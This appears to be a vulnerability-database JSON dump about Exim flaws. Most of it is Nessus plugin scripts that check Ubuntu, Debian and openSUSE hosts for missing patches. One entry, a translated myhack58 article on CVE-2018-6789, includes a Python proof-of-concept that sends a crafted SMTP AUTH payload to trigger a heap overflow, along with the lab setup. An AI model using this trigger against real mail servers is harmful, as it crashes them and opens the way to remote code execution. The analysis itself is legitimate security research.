Ubuntu Security Notice USN-3164-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96336);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"USN\", value:\"3164-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : exim4 vulnerability (USN-3164-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3164-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected exim4-daemon-heavy and / or exim4-daemon-light\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.76-3ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.76-3ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.82-3ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.82-3ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.86.2-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.86.2-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.87-3ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.87-3ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:49:58", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.", "edition": 30, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Debian DSA-3747-1 : exim4 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": 
"2016-12-27T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:exim4"], "id": "DEBIAN_DSA-3747.NASL", "href": "https://www.tenable.com/plugins/nessus/96104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3747. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96104);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"DSA\", value:\"3747\");\n\n script_name(english:\"Debian DSA-3747-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", 
reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-09-14T16:38:43", "description": "This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. 
\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-30T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2017-08-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:eximstats-html", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:exim-debugsource"], "id": "OPENSUSE-2017-980.NASL", "href": "https://www.tenable.com/plugins/nessus/102834", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-980.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102834);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-980 patch\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1046971\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-14.1\") 
) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-09T16:19:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-6789", "CVE-2016-9963", "CVE-2017-1000368"], "edition": 1, "description": "Statement: disclosed herein is a method and script for study and research use, any team or individual may use the disclosure herein related to content engaged in the illegal network attacks, otherwise all the consequences by the user himself to bear with the author of this article has nothing to do. \n2018 2 November, the popular open source mail server Exim exposed a heap overflow vulnerability, CVE-2018-6789, and affected nearly 4. 90. 1 all the previous versions. \nThe vulnerability finders\u2014Taiwan security researcher Meh on the blog is provided the use of the vulnerability for remote code execution of the ideas in the tweets also indicate that the final bypass various mitigation measures to successfully achieve remote code execution: \n\n! [](/Article/UploadPic/2018-4/201849174458151. png? www. myhack58. com) \nCurrently Meh and not disclose the exploit code, Huawei the first place lab security researcher skysider based on Meh idea in the experiment environment the successful implementation of the remote command is executed, the associated vulnerability of the environment and the use of the code please visit: https://github.com/skysider/VulnPOC/tree/master/CVE-2018-6789 \n1\\. 
Vulnerability causes \nThe root cause of the vulnerability is that the b64decode function, when decoding non-standard base64-encoded data, may overflow its heap buffer by one byte, a classic off-by-one vulnerability. \nThe vulnerable part of the b64decode function is as follows: \nb64decode(const uschar *code, uschar **ptr) \n{ \nint x, y; \nuschar *result = store_get(3*(Ustrlen(code)/4) + 1); \n*ptr = result; \n/* Each cycle of the loop handles a quantum of 4 input bytes. For the last \nquantum this may decode to 1, 2, or 3 output bytes. */ \n...... \n} \nThis code decodes base64 in groups of 4 bytes, each group decoding into 3 bytes; but when 3 bytes remain at the end, i.e. len(code)=4n+3, they are decoded into 2 bytes, so the total decoded length is 3n+2 bytes while the allocated heap space is only 3n+1 bytes, and a heap overflow occurs. The official fix is also very simple: allocate a few more bytes. \n2\\. Environment to build \nThe exim version tested in Meh's blog was installed directly via apt, but since the official Debian repository has already fixed the vulnerability in exim, you can check the patch information in the package source to confirm: \nroot@skysider:~/poc/exim4-4.86.2# apt-get source exim4 \n...... \ndpkg-source: info: applying 93_CVE-2017-1000368. patch \ndpkg-source: info: applying fix_smtp_banner. patch \ndpkg-source: info: applying CVE-2016-9963. patch \ndpkg-source: info: applying CVE-2018-6789. 
patch \nWe choose to download an earlier version of the source code to compile the installation: \nsudo apt-get build-dep exim4 \nwget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz \nDuring compilation you want to install some dependent libraries, you also need to modify the Makefile, create user, configuration, log file permissions, etc., can refer to the Dockerfile of the installation process. \nexim can be specified at run time configuration file, in order to trigger the vulnerability and command execution, you need to configure the CRAM-MD5 authenticator and is set acl_smtp_mail, etc., the configuration file is as follows: \nacl_smtp_mail=acl_check_mail \nacl_smtp_data=acl_check_data \nbegin acl \nacl_check_mail: \n. ifdef CHECK_MAIL_HELO_ISSUED \ndeny \nmessage = no HELO given before MAIL command \ncondition = ${if def:sender_helo_name {no}{yes}} \n. endif \naccept \nacl_check_data: \naccept \nbegin authenticators \nfixed_cram: \ndriver = cram_md5 \npublic_name = CRAM-MD5 \nserver_secret = ${if eq{$auth1}{ph10}{secret}fail} \nserver_set_id = $auth1 \nIn debug mode start the exim service: \nexim-bd-d-receive-C conf. conf \nYou can also directly use the docker to verify the vulnerability, the above commands for the default boot command of: \ndocker run-it --name exim-p 25:25 skysider/vulndocker:cve-2018-6789 \n3\\. Vulnerability testing \nWe use a simple poc to trigger the vulnerability, poc code is as follows: \n#!/ usr/bin/python \n# -*- coding: utf-8 -*- \nimport smtplib \nfrom base64 import b64encode \nprint \"this poc is tested in exim 4.89 x64 bit with cram-md5 authenticators\" \nip_address = raw_input(\"input ip address: \") \ns = smtplib. SMTP(ip_address) \n#s. set_debuglevel(1) \n# 1. put a huge chunk into unsorted bin \ns. ehlo(\"mmmm\"+\"b\"*0x1500) # 0x2020 \n# 2. send base64 data and trigger the off-by-one \n#raw_input(\"overwrite one byte of next chunk\") \ns. 
docmd(\"AUTH CRAM-MD5\") \npayload = \"d\"*(0x2008-1) \ntry: \ns. docmd(b64encode(payload)+b64encode('\\xf1\\xf1')[:-1]) \ns. quit() \nexcept smtplib. SMTPServerDisconnected: \nprint \"[!] exim server seems to be vulnerable to CVE-2018-6789.\" \nWhen executing this Code, it will trigger a memory error \n\n! [](/Article/UploadPic/2018-4/201849174458752. png? www. myhack58. com) \nIn this process, the stack of the main changes are as follows: \n\n! [](/Article/UploadPic/2018-4/201849174459960. png? www. myhack58. com) \nWe can go to observe the error before the stack, attach to the child process, the following figure is to send the ehlo message after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459191. png? www. myhack58. com) \nSend Auth data, we can look after executing the b64decode function after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459700. png? www. myhack58. com)\n\n**[1] [[2]](<89920_2.htm>) [[3]](<89920_3.htm>) [next](<89920_2.htm>)**\n", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2018/89920.htm", "id": "MYHACK58:62201889920", "type": "myhack58", "title": "Exim Off-by-One RCE vulnerability of CVE-2018-6789 use analysis(reference EXP)-vulnerability warning-the black bar safety net", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-08-29T21:10:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "description": "This update for exim fixes the following issues:\n\n Changes in exim:\n - specify users with ref:mail, to make them dynamic. 
(boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to "stack\n crash" local privilege escalation (boo#1044692)\n - Require user(mail) group(mail) to meet new users handling in TW.\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\n\n", "edition": 1, "modified": "2017-08-29T18:39:29", "published": "2017-08-29T18:39:29", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00072.html", "id": "OPENSUSE-SU-2017:2289-1", "title": "Security update for exim (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}